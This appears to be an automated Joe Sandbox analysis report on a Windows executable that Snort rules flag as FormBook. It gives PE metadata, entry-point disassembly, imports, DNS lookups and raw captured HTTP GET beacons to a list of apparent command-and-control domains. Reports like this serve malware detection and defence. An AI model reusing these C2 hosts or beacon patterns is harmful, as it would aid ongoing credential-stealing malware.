                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383936/sample/RCS76393.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                    Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                    ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                    • 199.59.242.153
                                                                    TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.958502033101644
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Clipper DOS Executable (2020/12) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: RCS76393.exe
File size: 386560
MD5: 1ab1c3129fa0764ea0702da70f3ef569
SHA1: ee8cd1946b58390f4599056df1472d01cf85a543
SHA256: 5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
SHA512: 58bb904dc8d4435e232936f2972037dbf8b214559d0156c5d5275fdc3547a25e7ce92910459cd7f5c737641df74078e7060f0825df79b99203c2fb5033a0501c
SSDEEP: 6144:jK3TcyLImYxn3QDQEachg1e4VqOWB4hqynGEpNA:jK3Td093QDQEachGeZ8Gs2
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L..."Z.^...........

                                                                    File Icon

Icon Hash: 8692f0c4c4ccb2ce

                                                                    Static PE Info

                                                                    General

Entrypoint: 0x4041a3
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x5EE25A22 [Thu Jun 11 16:21:54 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 9c90aa63bb435d1aab6db36d5bf4ee01

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F1EB8BC4ECDh
                                                                    jmp 00007F1EB8BBD9BEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    test ecx, 00000003h
                                                                    je 00007F1EB8BBDB66h
                                                                    mov al, byte ptr [ecx]
                                                                    add ecx, 01h
                                                                    test al, al
                                                                    je 00007F1EB8BBDB90h
                                                                    test ecx, 00000003h
                                                                    jne 00007F1EB8BBDB31h
                                                                    add eax, 00000000h
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    mov eax, dword ptr [ecx]
                                                                    mov edx, 7EFEFEFFh
                                                                    add edx, eax
                                                                    xor eax, FFFFFFFFh
                                                                    xor eax, edx
                                                                    add ecx, 04h
                                                                    test eax, 81010100h
                                                                    je 00007F1EB8BBDB2Ah
                                                                    mov eax, dword ptr [ecx-04h]
                                                                    test al, al
                                                                    je 00007F1EB8BBDB74h
                                                                    test ah, ah
                                                                    je 00007F1EB8BBDB66h
                                                                    test eax, 00FF0000h
                                                                    je 00007F1EB8BBDB55h
                                                                    test eax, FF000000h
                                                                    je 00007F1EB8BBDB44h
                                                                    jmp 00007F1EB8BBDB0Fh
                                                                    lea eax, dword ptr [ecx-01h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-02h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-03h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-04h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 20h
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    push edi
                                                                    push 00000008h
                                                                    pop ecx
                                                                    mov esi, 03DAD300h
                                                                    lea edi, dword ptr [ebp-20h]
                                                                    rep movsd
                                                                    mov dword ptr [ebp-08h], eax
                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                    pop edi
                                                                    mov dword ptr [ebp-04h], eax
                                                                    pop esi
                                                                    test eax, eax
                                                                    je 00007F1EB8BBDB4Eh
                                                                    test byte ptr [eax], 00000008h
                                                                    je 00007F1EB8BBDB49h
                                                                    mov dword ptr [ebp+00h], 00000000h

                                                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x39b18a0 | 0x67 | .new
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x39b0d84 | 0x3c | .new
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x39b2000 | 0x2ca0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x39b5000 | 0x1a9c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39afa58 | 0x40 | .new
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x39ad000 | 0x1e8 | .new
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4ab43 | 0x4ac00 | False | 0.740110263378 | data | 7.49545295007 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x4c000 | 0x395d288 | 0x1c00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.jidiy | 0x39aa000 | 0x1 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.wahe | 0x39ab000 | 0x1179 | 0x400 | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.new | 0x39ad000 | 0x4907 | 0x4a00 | False | 0.372096706081 | data | 5.4613035653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x39b2000 | 0x2ca0 | 0x2e00 | False | 0.558848505435 | data | 5.00204478072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x39b5000 | 0x9918 | 0x9a00 | False | 0.146027800325 | data | 1.75035156037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x39b3498 | 0x134 | data | |
RT_ICON | 0x39b23a0 | 0x10a8 | data | |
RT_STRING | 0x39b37b8 | 0x148 | data | |
RT_STRING | 0x39b3900 | 0x304 | data | |
RT_STRING | 0x39b3c08 | 0x510 | data | |
RT_STRING | 0x39b4118 | 0x502 | data | |
RT_STRING | 0x39b4620 | 0x424 | data | |
RT_STRING | 0x39b4a48 | 0xe6 | data | |
RT_STRING | 0x39b4b30 | 0x16e | data | |
RT_ACCELERATOR | 0x39b3460 | 0x18 | data | |
RT_GROUP_CURSOR | 0x39b35d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_ICON | 0x39b3448 | 0x14 | data | |
RT_VERSION | 0x39b35e8 | 0x1d0 | data | |
None | 0x39b3478 | 0xa | data | |
None | 0x39b3488 | 0xa | data | |

                                                                    Imports

DLL | Import
KERNEL32.dll | HeapReAlloc, RemoveVectoredExceptionHandler, EnumDateFormatsExW, FindResourceExW, WriteConsoleOutputCharacterA, LoadResource, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, GlobalLock, CancelWaitableTimer, LockFile, SetTapeParameters, GetModuleHandleW, EnumCalendarInfoExW, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, GetSystemTimeAdjustment, InterlockedPopEntrySList, GetFileAttributesA, GetCompressedFileSizeA, GetTimeZoneInformation, GetEnvironmentVariableA, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, GetProcAddress, GetAtomNameA, LocalAlloc, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, FatalExit, GetFileTime, GetConsoleCursorInfo, LocalFree, LCMapStringW, SetEnvironmentVariableA, CompareStringW, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, GetLastError, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FatalAppExitA, VirtualAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, HeapSize, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA
USER32.dll | GetProcessDefaultLayout

                                                                    Exports

Name | Ordinal | Address
Lolipops | 1 | 0x4448a0
NoMore | 2 | 0x444880
Robin | 3 | 0x444890

                                                                    Version Infos

                                                                    DescriptionData
                                                                    InternalNamecalimatimodunads.exe
                                                                    FileVersions7.0.2.54
                                                                    LegalCopyrightsVsekda
                                                                    ProductVersions7.0.21.45
                                                                    Translation0x0129 0x062b

                                                                    Network Behavior

                                                                    Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-12:46:58.836959 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.6 | 198.185.159.144
04/08/21-12:46:58.836959 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.6 | 198.185.159.144
04/08/21-12:46:58.836959 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.6 | 198.185.159.144
04/08/21-12:47:09.209527 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49742 | 34.102.136.180 | 192.168.2.6

                                                                    Network Port Distribution

                                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Apr 8, 2021 12:47:24.087763071 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087795973 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087848902 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:24.087867975 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:33.582299948 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692231894 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.692333937 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692498922 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.802305937 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.802937031 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803009987 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803033113 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803052902 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803070068 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803193092 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.803306103 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:38.885835886 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.937621117 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.938090086 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.938357115 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990061045 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990087032 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990317106 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990350962 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:39.041932106 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:44.149405956 CEST4975180192.168.2.694.46.9.37
                                                                    Apr 8, 2021 12:47:47.148294926 CEST4975180192.168.2.694.46.9.37
                                                                    Apr 8, 2021 12:47:53.148761988 CEST4975180192.168.2.694.46.9.37

                                                                    UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:46:38.335319042 CEST | 192.168.2.6 | 8.8.8.8 | 0xd2c6 | Standard query (0) | www.ly-iot.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:48.030651093 CEST | 192.168.2.6 | 8.8.8.8 | 0x5e24 | Standard query (0) | www.ronwongart.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:53.534490108 CEST | 192.168.2.6 | 8.8.8.8 | 0xb23 | Standard query (0) | www.vbkulkarni.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.687747002 CEST | 192.168.2.6 | 8.8.8.8 | 0x75b4 | Standard query (0) | www.pimpmyrecipe.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:03.972100973 CEST | 192.168.2.6 | 8.8.8.8 | 0xda46 | Standard query (0) | www.csgo-roll.net | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:09.055725098 CEST | 192.168.2.6 | 8.8.8.8 | 0x43ea | Standard query (0) | www.foodsystemsjusticeproject.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:14.224930048 CEST | 192.168.2.6 | 8.8.8.8 | 0x2ff5 | Standard query (0) | www.batiktintaemas.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:23.284853935 CEST | 192.168.2.6 | 8.8.8.8 | 0x5600 | Standard query (0) | www.breathharbour.net | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:28.412189960 CEST | 192.168.2.6 | 8.8.8.8 | 0x1d35 | Standard query (0) | www.libreo.club | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:33.472132921 CEST | 192.168.2.6 | 8.8.8.8 | 0x3f25 | Standard query (0) | www.addthat.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:38.813100100 CEST | 192.168.2.6 | 8.8.8.8 | 0x439 | Standard query (0) | www.evecrude.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:44.016849041 CEST | 192.168.2.6 | 8.8.8.8 | 0xb854 | Standard query (0) | www.generalflix.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 12:46:38.818474054 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2c6 | No error (0) | www.ly-iot.com | l.17986.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:46:38.818474054 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2c6 | No error (0) | l.17986.net | | 104.160.174.177 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:48.173165083 CEST | 8.8.8.8 | 192.168.2.6 | 0x5e24 | No error (0) | www.ronwongart.com | | 104.161.84.100 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:53.672425032 CEST | 8.8.8.8 | 192.168.2.6 | 0xb23 | Name error (3) | www.vbkulkarni.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | www.pimpmyrecipe.com | ext-cust.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:09.078679085 CEST | 8.8.8.8 | 192.168.2.6 | 0x43ea | No error (0) | www.foodsystemsjusticeproject.com | foodsystemsjusticeproject.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:09.078679085 CEST | 8.8.8.8 | 192.168.2.6 | 0x43ea | No error (0) | foodsystemsjusticeproject.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:14.548867941 CEST | 8.8.8.8 | 192.168.2.6 | 0x2ff5 | No error (0) | www.batiktintaemas.com | batiktintaemas.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:14.548867941 CEST | 8.8.8.8 | 192.168.2.6 | 0x2ff5 | No error (0) | batiktintaemas.com | | 193.168.194.206 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:23.360908031 CEST | 8.8.8.8 | 192.168.2.6 | 0x5600 | Server failure (2) | www.breathharbour.net | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:28.458304882 CEST | 8.8.8.8 | 192.168.2.6 | 0x1d35 | Name error (3) | www.libreo.club | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:33.581131935 CEST | 8.8.8.8 | 192.168.2.6 | 0x3f25 | No error (0) | www.addthat.xyz | | 199.59.242.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | www.evecrude.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:44.147923946 CEST | 8.8.8.8 | 192.168.2.6 | 0xb854 | No error (0) | www.generalflix.com | generalflix.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:44.147923946 CEST | 8.8.8.8 | 192.168.2.6 | 0xb854 | No error (0) | generalflix.com | | 94.46.9.37 | A (IP address) | IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.ly-iot.com
                                                                    • www.ronwongart.com
                                                                    • www.pimpmyrecipe.com
                                                                    • www.foodsystemsjusticeproject.com
                                                                    • www.batiktintaemas.com
                                                                    • www.addthat.xyz
                                                                    • www.evecrude.xyz

                                                                    HTTP Packets

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    0 | 192.168.2.6 | 49723 | 104.160.174.177 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:46:42.498070002 CEST | 1250 | OUT | GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ly-iot.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:43.287656069 CEST | 1252 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.17.10
                                                                    Date: Thu, 08 Apr 2021 10:46:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.15
                                                                    Data Ascii: 19e3<html> <head> <title>ly-iot.com - The domain is available for purchase</title><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/><script src="http://libs.baidu.com/jquery/1.9.0/jquery.js"></script><script>$(document).ready(function(){if(window.screen.height<700){$("*").css({"width":"auto","height":"auto","background-image":"none","position":"static"});$("p").css("color","black");$(".stencil-tip").css("line-height","30px");}});</script> <style type="text/css">BODY {FONT-SIZE: 12px; MARGIN: 18px 0px 0px; COLOR: #424242; BACKGROUND-COLOR: #fff; TEXT-ALIGN: center}TD {FONT-FAMILY: Arial}P {FONT-FAMILY: Arial}DIV {FONT-FAMILY: Arial}INPUT {FONT-FAMILY: Arial}IMG {BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px}TD {FONT-SIZE: 12px; LINE-HEIGHT: 150%}TH {FONT-SIZE: 12px; LINE-HEIGHT: 150%}#f {MARGIN: 0px; PADDING-TOP: 4px}#B {WIDTH: 800px}.header {BORDER-BOTTOM: #b2d0ea 1px so
                                                                    Apr 8, 2021 12:46:43.287707090 CEST | 1253 | IN
                                                                    Data Ascii: lid; HEIGHT: 13px}.header .l {FLOAT: left}.header .r {FLOAT: right}.word {MARGIN-TOP: 38px;FONT-WEIGHT: bold;FONT-SIZE: 20px;COLOR: #58677d;TEXT-INDENT: 20px;TEXT-ALIGN: left;margin-bottom: 30px;}.wor
                                                                    Apr 8, 2021 12:46:43.287720919 CEST | 1255 | IN
                                                                    Data Ascii: 12px; TEXT-DECORATION: none}.download {MARGIN-BOTTOM: 12px}.ph {COLOR: #333333}.pg {COLOR: #737373}.style2 {font-size: 16px}.style3 {color: #FF0000}.comment {font-size:12px; color:#999; line-height:150%;}
                                                                    Apr 8, 2021 12:46:43.287738085 CEST | 1256 | IN
                                                                    Data Ascii: nbsp;</div> <div class="r">&nbsp;</div> </div> <div class="conter"> <table width="775" cellspacing="0" cellpadding="0"> <tbody> <tr> <td align="center" vali
                                                                    Apr 8, 2021 12:46:43.287756920 CEST | 1257 | IN
                                                                    Data Ascii: pan></div> <strong> </strong></div> </td> <td width="561" valign="top"><br />
                                                                    Apr 8, 2021 12:46:43.287769079 CEST | 1258 | IN
                                                                    Data Ascii: <p style="height: 12px;">Copyright &copy; 1998 - 2009 <a target="_blank" href="http://www.4.cn">4.cn</a> All Rights Reserved</p> </div> </center> <p>&nbsp;</p> <div style="display:none"><script src="https
                                                                    Apr 8, 2021 12:46:43.287785053 CEST | 1258 | IN
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    1 | 192.168.2.6 | 49726 | 104.161.84.100 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:46:48.335388899 CEST | 1385 | OUT | GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ronwongart.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:48.497931004 CEST | 1403 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 08 Apr 2021 10:47:07 GMT
                                                                    Content-Type: text/html; charset=GBK
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.6 | 49741 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:46:58.836958885 CEST | 5606 | OUT | GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.pimpmyrecipe.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:58.951539993 CEST | 5609 | IN | HTTP/1.1 400 Bad Request
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Length: 77564
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Thu, 08 Apr 2021 10:46:58 UTC
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                    Pragma: no-cache
                                                                    Server: Squarespace
                                                                    X-Contextid: rofEdlC9/lBVebWxJ
                                                                    Connection: close
